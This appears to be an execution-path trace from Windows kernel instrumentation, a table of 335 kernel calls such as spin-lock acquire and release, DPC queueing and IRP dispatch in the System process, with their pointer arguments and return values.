Execution Path #183 (length: 335, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 335 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573e20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b4669f0, Irp_unk_out = 0xffffe0003b4669f0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b4669f0, Irp_unk_out = 0xffffe0003b4669f0, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d574250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a78773c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573e20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d573eb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a766464 |
